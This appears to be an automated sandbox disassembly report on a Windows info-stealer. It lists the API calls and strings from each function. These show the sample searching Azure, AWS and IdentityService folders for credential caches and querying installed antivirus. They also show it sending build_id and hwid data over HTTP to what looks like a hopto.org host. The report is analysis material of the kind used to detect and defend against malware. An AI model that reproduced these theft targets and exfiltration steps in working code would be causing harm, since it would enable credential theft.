InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404D83
HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00404DC7
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00404DF5

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

lstrlenA.KERNEL32(?,00436953,",build_id,004377C4,------,004377B8,",hwid,004377A4,------), ref: 004050EE
lstrlenA.KERNEL32(?,?,00000000), ref: 00405101
HttpSendRequestA.WININET(00000000,?,00000000), ref: 0040510F
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040516C
InternetCloseHandle.WININET(00000000), ref: 00405177
InternetCloseHandle.WININET(?), ref: 0040518E
InternetCloseHandle.WININET(?), ref: 0040519A

Strings

------, xrefs: 00404C75
------, xrefs: 00404F5B
8wA, xrefs: 00405222
build_id, xrefs: 0040500D
------, xrefs: 00404DFB
", xrefs: 00405039
", xrefs: 00404ED9
hwid, xrefs: 00404EAD

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileOptionReadSend
String ID: "$"$------$------$------$8wA$build_id$hwid
API String ID: 3006978581-858375883
Opcode ID: 34a212d76a3bfc79e74cf83c5d1317f3bdb29bc58600130ec353d97f1a3d475c
Instruction ID: 7219792e9a540e442724c4d24598c6325e7ae8fa207a63d5b21e459a2de286cb
Opcode Fuzzy Hash: 34a212d76a3bfc79e74cf83c5d1317f3bdb29bc58600130ec353d97f1a3d475c
Instruction Fuzzy Hash: C002C371D5512A9ACF20EB21CD46ADDB7B5FF04308F4140E6A54873191DAB87ECA8FD8

Function 00401666 Relevance: 35.1, APIs: 18, Strings: 2, Instructions: 129memoryfileCOMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00401696
wsprintfW.USER32 ref: 004016BC
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000100,00000000), ref: 004016E6
GetProcessHeap.KERNEL32(00000008,000FFFFF), ref: 004016FE
RtlAllocateHeap.NTDLL(00000000), ref: 00401705
_time64.MSVCRT ref: 0040170E
srand.MSVCRT ref: 00401715
rand.MSVCRT ref: 0040171E
_memset.LIBCMT ref: 0040172E
WriteFile.KERNEL32(?,00000000,000FFFFF,?,00000000), ref: 00401746
_memset.LIBCMT ref: 00401763
CloseHandle.KERNEL32(?), ref: 00401771
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,04000100,00000000), ref: 0040178D
ReadFile.KERNEL32(00000000,00000000,000FFFFF,?,00000000), ref: 004017A9
_memset.LIBCMT ref: 004017BE
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004017C8
RtlFreeHeap.NTDLL(00000000), ref: 004017CF
CloseHandle.KERNEL32(?), ref: 004017DB

Strings

%s%s, xrefs: 004016B6
delays.tmp, xrefs: 004016A4

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FileHeap$_memset$CloseCreateHandleProcess$AllocateFreePathReadTempWrite_time64randsrandwsprintf
String ID: %s%s$delays.tmp
API String ID: 1620473967-1413376734
Opcode ID: 5943a0df419b2f97d08efb2acebaf1400ff012adf14d9747056922950aa0c363
Instruction ID: 11c0bd3ed3d7e6805384e8c578cb98533790a078e52b8311c5bcc7c05517a4c3
Opcode Fuzzy Hash: 5943a0df419b2f97d08efb2acebaf1400ff012adf14d9747056922950aa0c363
Instruction Fuzzy Hash: 2B41C8B1900218ABD7205F61AC4CF9F7B7DEB89715F1006BAF109E10A1DA354E54CF28

Function 004164BD Relevance: 33.4, APIs: 10, Strings: 9, Instructions: 114stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004164E2

Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

lstrcatA.KERNEL32(?,00000000,?,00000000,?), ref: 00416501
lstrcatA.KERNEL32(?,\.azure\), ref: 0041651E

Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416018
Part of subcall function 00415FD1: FindFirstFileA.KERNEL32(?,?), ref: 0041602F
Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB4), ref: 00416050
Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB8), ref: 0041606A
Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416091
Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436647), ref: 004160A5
Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160C2
Part of subcall function 00415FD1: PathMatchSpecA.SHLWAPI(?,?), ref: 004160EF
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?), ref: 00416125
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD0), ref: 00416137
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 0041614A
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD4), ref: 0041615C
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 00416170

_memset.LIBCMT ref: 00416556
lstrcatA.KERNEL32(?,00000000), ref: 00416578
lstrcatA.KERNEL32(?,\.aws\), ref: 00416595

Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160D9
Part of subcall function 00415FD1: FindNextFileA.KERNEL32(?,?), ref: 004162FF
Part of subcall function 00415FD1: FindClose.KERNEL32(?), ref: 00416313

_memset.LIBCMT ref: 004165CA
lstrcatA.KERNEL32(?,00000000), ref: 004165EC
lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00416609
_memset.LIBCMT ref: 0041663E

Strings

*.*, xrefs: 004165AA
Azure\.azure, xrefs: 00416531
msal.cache, xrefs: 0041661E
Azure\.aws, xrefs: 004165A5
*.*, xrefs: 00416536
\.IdentityService\, xrefs: 004165FD
Azure\.IdentityService, xrefs: 00416619
\.aws\, xrefs: 00416589
\.azure\, xrefs: 00416512

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$_memsetwsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
API String ID: 4216275855-974132213
Opcode ID: 76b6cfcc2cbbf7bce573afa5f5241ca90d425f37a5191db5c0e06d16ae103776
Instruction ID: c1663bc4ae337e97e36098b0a6fa5269247debf2670cee4f463a309fb8bc2b96
Opcode Fuzzy Hash: 76b6cfcc2cbbf7bce573afa5f5241ca90d425f37a5191db5c0e06d16ae103776
Instruction Fuzzy Hash: 2741C671D4021C7BDB14EB61EC47FDD7378AB09308F5044AAB605B7090EAB9AB888F59

Function 0040ABE5 Relevance: 33.3, APIs: 22, Instructions: 315stringmemoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

CopyFileA.KERNEL32(?,?,00000001,004373D0,00436812,?,?,?), ref: 0040AC8A
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040AD94
RtlAllocateHeap.NTDLL(00000000), ref: 0040AD9B
StrCmpCA.SHLWAPI(?,004373DC,00000000), ref: 0040AE4C
StrCmpCA.SHLWAPI(?,004373E0), ref: 0040AE74
lstrcatA.KERNEL32(00000000,?), ref: 0040AE98
lstrcatA.KERNEL32(00000000,004373E4), ref: 0040AEA4
lstrcatA.KERNEL32(00000000,?), ref: 0040AEAE
lstrcatA.KERNEL32(00000000,004373E8), ref: 0040AEBA
lstrcatA.KERNEL32(00000000,?), ref: 0040AEC4
lstrcatA.KERNEL32(00000000,004373EC), ref: 0040AED0
lstrcatA.KERNEL32(00000000,?), ref: 0040AEDA
lstrcatA.KERNEL32(00000000,004373F0), ref: 0040AEE6
lstrcatA.KERNEL32(00000000,?), ref: 0040AEF0
lstrcatA.KERNEL32(00000000,004373F4), ref: 0040AEFC
lstrcatA.KERNEL32(00000000,?), ref: 0040AF06
lstrcatA.KERNEL32(00000000,004373F8), ref: 0040AF12
lstrcatA.KERNEL32(00000000,?), ref: 0040AF1C
lstrcatA.KERNEL32(00000000,004373FC), ref: 0040AF28
lstrlenA.KERNEL32(00000000), ref: 0040AF7A
lstrlenA.KERNEL32(?), ref: 0040AF95
DeleteFileA.KERNEL32(?), ref: 0040AFD8

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
String ID:
API String ID: 1956182324-0
Opcode ID: bd24911d9c6cfefd4e37482eb3b4265b0e4e890a277d74ec42a85d9c1a9561a1
Instruction ID: ea3aaa4254ea011307d5ff1151e45a3af1a32ea2cb92a891b43a4b7d07102f87
Opcode Fuzzy Hash: bd24911d9c6cfefd4e37482eb3b4265b0e4e890a277d74ec42a85d9c1a9561a1
Instruction Fuzzy Hash: E6C15D32904208AFDF15EFA1ED4A9DD7B76EF04309F20102AF501B30A1DB7A6E959F95

Function 00417041 Relevance: 29.0, APIs: 8, Strings: 8, Instructions: 1029networksleepCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00410C53: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
Part of subcall function 00410C53: HeapAlloc.KERNEL32(00000000,?,?,?,004013B9), ref: 00410C66
Part of subcall function 00410C53: GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

CloseHandle.KERNEL32(00000000,?,?,?,?,0041858F), ref: 004170DD
OpenEventA.KERNEL32(001F0003,00000000,?,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004170EC
CreateDirectoryA.KERNEL32(?,00000000,004366DA), ref: 0041760A
InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004176CB
InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004176E4

Part of subcall function 00404B2E: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00404BCD
Part of subcall function 00404B2E: StrCmpCA.SHLWAPI(?), ref: 00404BEB

Part of subcall function 004139C2: StrCmpCA.SHLWAPI(?,block,?,?,00417744), ref: 004139D7
Part of subcall function 004139C2: ExitProcess.KERNEL32 ref: 004139E2

Part of subcall function 00405F39: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00405FD8
Part of subcall function 00405F39: StrCmpCA.SHLWAPI(?), ref: 00405FF6

Part of subcall function 00413198: strtok_s.MSVCRT ref: 004131B7
Part of subcall function 00413198: strtok_s.MSVCRT ref: 0041323A

Sleep.KERNEL32(000003E8), ref: 00417A9A

Part of subcall function 00405F39: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040618E
Part of subcall function 00405F39: HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 004061D2
Part of subcall function 00405F39: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406200

CreateEventA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,0041858F), ref: 00417100

Part of subcall function 0041257F: __EH_prolog3_catch_GS.LIBCMT ref: 00412589
Part of subcall function 0041257F: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0000013C,00417E31,.exe,00436CCC,00436CC8,00436CC4,00436CC0,00436CBC,00436CB8,00436CB4,00436CB0,00436CAC,00436CA8,00436CA4), ref: 004125A8
Part of subcall function 0041257F: Process32First.KERNEL32(00000000,00000128), ref: 004125B8
Part of subcall function 0041257F: Process32Next.KERNEL32(00000000,00000128), ref: 004125CA
Part of subcall function 0041257F: StrCmpCA.SHLWAPI(?), ref: 004125DC
Part of subcall function 0041257F: CloseHandle.KERNEL32(00000000), ref: 004125F0

CloseHandle.KERNEL32(?), ref: 00418000

Strings

.exe, xrefs: 00417E04
6c8ce6f422a1d9cf34f23d1c2168e754, xrefs: 0041770C
http://, xrefs: 00417E57
cowod., xrefs: 00417E7B
.exe, xrefs: 00417549
_DEBUG.zip, xrefs: 00417F35
hopto, xrefs: 00417E9F
org, xrefs: 00417EE7

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InternetOpen$CloseCreateHandlelstrcpy$EventHeapProcessProcess32strtok_s$AllocConnectDirectoryExitFirstH_prolog3_catch_HttpNameNextOptionRequestSleepSnapshotToolhelp32Userlstrcatlstrlen
String ID: .exe$.exe$6c8ce6f422a1d9cf34f23d1c2168e754$_DEBUG.zip$cowod.$hopto$http://$org
API String ID: 305159127-1559868639
Opcode ID: 7b25bb2eaa3a6cd7e0aea663192725cd6b06aabe44a9b574830072b1d532ec21
Instruction ID: 6931a3cdf0a24aa58a91b10b9e7b8ba7caee6cf73e2bca90393059e53503fd57
Opcode Fuzzy Hash: 7b25bb2eaa3a6cd7e0aea663192725cd6b06aabe44a9b574830072b1d532ec21
Instruction Fuzzy Hash: A89231715483419FC620FF26D94268EB7E1FF84308F51482FF58467191DBB8AA8D8B9B

Function 004135A8 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 262stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 004135EA
StrCmpCA.SHLWAPI(?,true), ref: 004136AC

Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581

lstrcpyA.KERNEL32(?,?), ref: 0041376E
lstrcpyA.KERNEL32(?,00000000), ref: 0041379F
lstrcpyA.KERNEL32(?,00000000), ref: 004137DB
lstrcpyA.KERNEL32(?,00000000), ref: 00413817
lstrcpyA.KERNEL32(?,00000000), ref: 00413853
lstrcpyA.KERNEL32(?,00000000), ref: 0041388F
lstrcpyA.KERNEL32(?,00000000), ref: 004138CB
strtok_s.MSVCRT ref: 0041398F

Strings

false, xrefs: 004136C5
true, xrefs: 004136A6

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$strtok_s$lstrlen
String ID: false$true
API String ID: 2116072422-2658103896
Opcode ID: a279cf5f2d9bb332d4ea2d779ea3926242373e75fc1a37c080be92b7bd300130
Instruction ID: c59aadfba82ba9961634352731141a8533392cfc76d17a14f51357a5b51db833
Opcode Fuzzy Hash: a279cf5f2d9bb332d4ea2d779ea3926242373e75fc1a37c080be92b7bd300130
Instruction Fuzzy Hash: 5DB16DB5900218ABCF64EF55DC89ACA77B5BF18305F0001EAE549A7261EB75AFC4CF48

Function 00405237 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 161networkmemoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040527E
RtlAllocateHeap.NTDLL(00000000), ref: 00405285
InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 004052A7
StrCmpCA.SHLWAPI(?), ref: 004052C1
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004052F1
HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00405330
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405360
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040536B
HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00405394
InternetReadFile.WININET(?,?,00000400,?), ref: 004053DA
InternetCloseHandle.WININET(?), ref: 00405439
InternetCloseHandle.WININET(?), ref: 00405445
InternetCloseHandle.WININET(?), ref: 00405451

Strings

GET, xrefs: 00405325
\xA, xrefs: 00405250, 00405457, 0040539E

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttp$HeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
String ID: GET$\xA
API String ID: 442264750-571280152
Opcode ID: e5d221f0112c41c2442819da8cf0992f09120ff3d4c743fde11cfb3d63f6140b
Instruction ID: d8c65d4c733feb9e18663b71d867c9ad77c8898020ac32f61dd77686cef25eee
Opcode Fuzzy Hash: e5d221f0112c41c2442819da8cf0992f09120ff3d4c743fde11cfb3d63f6140b
Instruction Fuzzy Hash: B75118B1900A28AFDF21DF64DC84BEFBBB9EB08346F0050E6E509A2290D6755F858F55

Function 00411997 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 114comCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 0041199E
CoInitializeEx.OLE32(00000000,00000000,00000030,00413F67,?,AV: ,004368C4,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 004119AD
CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 004119BE
CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 004119D8
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411A0E
VariantInit.OLEAUT32(?), ref: 00411A5D

Part of subcall function 00411D42: LocalAlloc.KERNEL32(00000040,00000005,?,?,00411A80,?), ref: 00411D4A
Part of subcall function 00411D42: CharToOemW.USER32(?,00000000), ref: 00411D56

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

VariantClear.OLEAUT32(?), ref: 00411A8B

Strings

root\SecurityCenter2, xrefs: 004119F0
Unknown, xrefs: 00411AB4
displayName, xrefs: 00411A6F
WQL, xrefs: 00411A28
Unknown, xrefs: 00411A99
Select * From AntiVirusProduct, xrefs: 00411A23
Unknown, xrefs: 00411AA0

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
